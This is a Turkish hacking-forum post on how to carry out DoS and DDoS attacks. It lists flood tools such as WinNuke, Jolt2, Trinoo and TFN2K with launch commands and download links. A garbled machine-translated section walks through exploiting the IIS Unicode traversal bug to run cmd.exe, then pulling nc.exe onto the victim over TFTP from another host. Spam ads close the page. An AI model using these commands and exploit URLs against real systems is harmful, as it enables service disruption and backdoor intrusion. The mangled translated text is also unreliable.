Ddos yapımı

endLesS

Webmaster
SeLAmun ALEyKum




DOS(Denial Of Services) ve DDOS(Distributed Denial Of Services) Atakları

Konu başlıkları


DoS atakları Nedir?
DDoS atakları Nedir?
DoS Ataklarının Türleri?
DoS Atakları için kullanılan programlar?
DDoS Atakları için kullanılan programlar?


DoS atakları Nedir?


DoS yani açılımı Denial of Sevice olan bu saldırı çeşidi bir hizmet aksatma yöntemidir.Bir kişinin bir sisteme düzenli veya arka arkaya yaptığı saldırılar sonucunda hedef sistemin kimseye hizmet veremez hale gelmesi veya o sisteme ait tüm kaynakların tüketimini amaçlayan bir saldırı çeşididir.Birçok Yöntemle Hizmet aksatma saldırıları gerçekleştirilebilir.
Genellikle kullanılan yöntemler üç sınıf altında toplanabilir.
Bant Genişliğine Yönelik Ataklar
Protokol Atakları
Mantıksal Ataklar.
================================================== =======


DDoS atakları Nedir?


Bir saldırgan daha önceden tasarladığı BİR ÇOK makine üzerinden hedef bilgisayara saldırı yaparak hedef sistemin kimseye hizmet veremez hale gelmesini amaçlayan bir saldırı çeşididir.


Koordineli olarak yapılan bu işlem hem saldırının boyutunu artırır hem de saldırıyı yapan kişinin gizlenmesini sağlar. Bu işlemleri yapan araçlara Zombi denir.
Bu saldırı çeşidinde saldırganı bulmak zorlaşır.


Çünkü saldırının merkezinde bulunan saldırgan aslında saldırıya katılmaz. Sadece diğer ip numaralarını yönlendirir.Eğer saldırı bir tek ip adresinden yapılırsa bir Firewall bunu rahatlıkla engelliyebilir. Fakat saldırı daha yüksek sayıdaki ip adresinden gelmesi Firewall un devre dışı kalmasını sağlar(Log taşması firewall servislerini durdurur).İşte bu özelliği onu DoS sadırısından ayıran en önemli özelliğidir.


================================================== ======


DoS Ataklarının Türleri?


Service Overloading: Bu atak tipi belirli host ve servisleri düşürmek için kullanılır. Atak yapan kişi özel port ve host a bir çok ICMP paketi gönderir.Bu olay network monitör ile kolayca anlaşılır


Message flooding: Service Overloading den farkı sistemin normal çalışmasını engellemez. Yine aynı şekilde gönderilen paketler bu sefer normal olarak algılanır. Örnek Nis serverında flood yapılırsa (Unix network) Nis bunu şifre şifre isteği gibi görür. Ve saldırganın host a hükmetmesi sağlanır.


Clogging: Saldırganın SYN gönderip ACK alıp ondan sonrada gelen ACK ya cevap vermeyip sürekli syn göndermesinden oluşur. Bu durum defalarca kez tekrarlanırsa server artık cevap veremez hale gelir. Bu paketler sahte ip ile gönderildiğinden sistem bunu anlayamaz ve hizmeti keser. Anlasa ne olur, anlasa aynı ip den gelen o kadar istege cevap vermez. Kurtuluş yolu bunları tarayan firewall lardır.


================================================== =======


DoS Atakları için kullanılan programlar?


Ping Of Death
Bir saldırgan hedef aldığı bir makineye büyük ping paketleri gönderir. Birçok işletim sistemi gelen bu maksimum derecede paketleri anlayamaz, cevap vermez duruma gelir ve işletim sistemi ya ağdan düşer ya da çöker.
SSPing
SSPing bir DoS aracıdır.SSPing programı hedef sisteme yüksek miktarda ICMP veri paketleri gönderir. İşletim sistemi bu aldığı data paketlerini birbirinden ayırmaya çalışır.Sonuç olarak bir hafıza taşması yaşar ve hizmet vermeyi durdurur.


Land Exploit
Land Exploit bir DoS atak programıdır. TCP SYN paketiyle hedef sisteme saldırıdır. Saldırı aynı port numarasına sürekli olarak yapılır. Land Expoit aynı kaynak ve hedef portları kullanarak SYN paketleri gönderir.
Bir Çok Makine bu kadar yüklenmeyi kaldıramayacağı için Buffer overflow yaşar ve hiçbir bağlantıyı kabul edemeyecek duruma gelir.


Smurf
Smurf broadcast adreslere ICMP paketleri gönderen bir DoS Saldırı programıdır.Saldırgan ICMP echo istekleri yapan kaynak adresi değiştirerek ip broadcast a gönderir. Bu broadcast network üzerindeki her makinenin bu istekleri almasına ve her makinenin bu sahte ipli adrese cevap vermesini sağlar.Bu sayede yüksek seviyede network trafiği yaşanır. Sonuç olarak bir DoS saldırısı gerçekleşmiş olur.
Bir TCP bağlantısının başında istekte bulunan uygulama SYN paketi gönderir. Buna cevaben alıcı site SYN-ACK paketi göndererek isteği aldığını teyit eder. Herhangi bir sebeple SYN-ACK paketi gidemezse alıcı site bunları biriktirir ve periyodik olarak göndermeye çalışır.
Zombilerde kullanılarak, kurban siteye dönüş adresi kullanımda olmayan bir IP numarası olan çok fazla sayıda SYN paketi gönderilirse hedef sistem SYN-ACK paketlerini geri gönderemez ve biriktirir. Sonuçta bu birikim kuyrukların dolup taşmasına sebep olur ve hedef sistem normal kullanıcılarına hizmet verememeye başlar.


WinNuke
WinNuke programı hedef sistemin 139 nolu portuna “out of band” adı verilen verileri gönderir. Hedef bunları tanımlayamaz ve sistem kilitlenir.
Kullanımı
WNUKE4 -c XXX.com 10000 0 450
(hedefe 10,000 adet 450 byte lık icmp paketleri gönderir.)
WNUKE4 -n XXX.com 0 1024-2024 6667-6668 UNPORT


Jolt2
Jolt2 kendisini farklı segmentte bulunuyormuş izlenimi vererek NT/2000 makinelere DoS atak yapabilen bir programdır. İllegal paketler göndererek hedefin işlemcisini %100 çalıştırıp kilitlenmesine yol açar.
c: \> jolt2 1.2.3.4 -p 80 4.5.6.7
Komut satırında görülen, 1.2.3.4 ip numarası saldırganın spoof edilmiş adresidir. Hedef adresin 4.5.6.7 80 nolu portuna saldırı yapar.
CPU kaynaklarını tamamını harcar ve sistemi aksatır


Bubonic.c
Bubonic.c Windows 2000 makineleri üzerinde DoS exploit lerinden faydalanarak çalışan bir programdır.
Hedefe düzenli olarak TCP paketlerini gönderir.
c: \> bubonic 12.23.23.2 10.0.0.1 100


Targa
Targa 8 farklı modül içinde saldırı yapabilen bir Denial of Service Programıdır.
================================================== =======


DDoS Atakları için kullanılan programlar?
1.Trinoo
2.TFN
3.Stacheldraht
4.Shaft
5.TFN2K
6.mstream
================================================== =======



DDOS – Saldırı Yöntemi


Tüm DDoS programları iki safhada çalışır.
Mass-intrusion Phase – Bu safhada DoS saldırısı yapacak olan sistemlere ulaşılır ve saldırıyı gerçekleştirecek olan programlar yüklenir. Bunlar birincil kurbanlardır.
DDoS Attack Phase – Bu safhada hedef sitelere saldırı yapılır bunun içinde birincil kurbanlar kullanılarak hedefe yüklenilir.


Trinoo
İNDİR
Trinoo DDoS yöntemini kullanan ilk programdır.
Kullandığı TCP Portları:
Attacker to master: 27665/tcp
Master to daemon: 27444/udp
Daemon to master: 31335/udp


TFN2K
İNDİR
Zombilerin yüklendiği makineler listening modda çalışır. Her an karşıdan gelecek komutlara hazırdır.
Running the server
#td
Running the client
#tn -h 23.4.56.4 -c8 -i 56.3.4.5 bu komut 23.4.56.4 nolu ipden 56.3.4.5 nolu ip ye saldırı başlatır.


Stacheldraht
TFN ve Trinoo gibi çalışır fakat modüllerine paketleri kriptolu gönderebilir.
Kullandığı portlar TCP ve ICMP
Client to Handler: 16660 TCP
Handler to and from agents: 65000 ICMP



alintidir///
Godshand rumuzlu bir kisi tarafindan yazilmistir. programlarin kullandigi port'lar disinda kisinin kendi yazisidir.


DDOS HAKKINDAKİ doc UZANTILI INGILIZCE TEKNIK EĞİTİM:

Shared Search - Free Shared Files


Netcat-mallvre arka kapı kullanımları
HPing



hping bir komut satırı odaklı TCP / IP paket assembler kullanılabilir / analisti. hping ICMP isteklerini destekler ve de yankı gönderir TCP, UDP, ICMP ve RAW-IP protokolleri, traceroute modu vardır, yeteneği kapalı kanal arasında dosya göndermek ve birçok başka özellik.

Hping bir biridir doğrusu güvenlik denetim ve güvenlik duvarları ve ağ testleri için araçlar. Süre hping çoğunlukla geçmişte bir güvenlik aracı olarak kullanılan, o kişi tarafından, güvenlik ile ilgili test ağları ve bilgisayarlar umurumda değil birçok şekilde kullanılabilir. Sen hping kullanarak yapabilirsiniz malzeme bir alt kümesi:
Güvenlik duvarı test
Advanced Port tarama
Network testing, using different protocols, TOS, fragmentation
Manuel Path MTU Discovery
Gelişmiş traceroute tüm desteklenen protokoller altında
Uzak OS parmak izi
Uzaktan uptime tahmin
TCP / IP yığınlarının denetim
Hping sistemleri gibi aşağıdaki unix çalışır: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOS X, Windows.



DownLoad Hpinq İndir http://d9n.blogspot.com/2009/08/hping.html



hping_1.jpg

google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);


Netcat Kullanımı HACK BLOG: Using NetCat


Bu yazı, ben göstermek olacak bir kesmek eksiksiz, öğretici ücretsiz kullanarak: Netcat sadece, sadece ne kadar çok yönlü işaret etmek.

türü "nc /?Çeşitli seçenekleri keşfetmek için "(tırnak işaretleri olmadan) / netcat ilgili geçer.

Port Netcat tarama
Hobbit gelen bir tarama örneğin "nc-v-w 2-z hedef 20-30" dir. Netcat her noktasına 20 ile 30 ila hedefe bağlayan çalışacağız.
-z bir TCP bağlantısı için herhangi bir veri gönderme ve UDP bağlantı çok sınırlı prob veri ve böylece hızlı bir tarama modu sadece ne bağlantı noktaları görmek için hedef olarak dinleme yararlıdır önler.



a1pxqo.jpg
Biz 192.168.1.1, limanlar 1-200 taradı. Gördüğünüz başkalarının arasında bağlantı noktası 80, 21 ve 25 açıktır.


Banner Grabbing Netcat ile
Şimdi ne noktası 80 ve 21 arkasında çalışan's bilmek isteriz. Biz Netcat şu şekilde liman afiş kapmak için kullanabilirsiniz:



okud1h.jpg


2ajyq0h.jpg
's Hatalı biçimlendirilmiş bir URL'yi yararlanmaya çalışır göndermek için deneyelim Unicode Dosya Geçişi güvenlik açığıyamasız IIS sunucularında (Pre SP3). Temelde bu istismar "C çıkmak için: \ inetpub bize sağlar \ wwwroot ve keşfetmek ve saldırıya makine herhangi programları çalıştırmaya.

24whevd.jpg
Voila! Biz URL gönderdik:
http://192.168.1.90/scripts/ ..% 255c../winnt/system32/cmd.exe? / c + dir + c:% savunmasız IIS sunucusunda 5C ve ne gördüğümüz IIS bir dizin listesi olduğunu sunucu C sürücüsü. Büyük! Şimdi IIS sunucusuna Netcat yüklemek için, bu yüzden TFTP kullanacağınız ve hatalı URL'ye TFTP komutları entegre istiyorum



6savma.jpg
tftp-I 192.168.1.9 nc.exe GET
Aktarılır:
http:// <Exploit URL> / C + + TFTP-i +192.168.1.9 + GET + nc.exe
Ayrıca, eğer başarıyla nc.exe dosya All görmek için TFTP sunucusu bir not almak:


23lcrqc.jpg
Part 2'yi Vericem
 
bayigram takipçi satın al instagram beğeni satın al instagram takipçi satın al tiktok takipçi satın al Buy Followers haber
vozol puff
Geri
Üst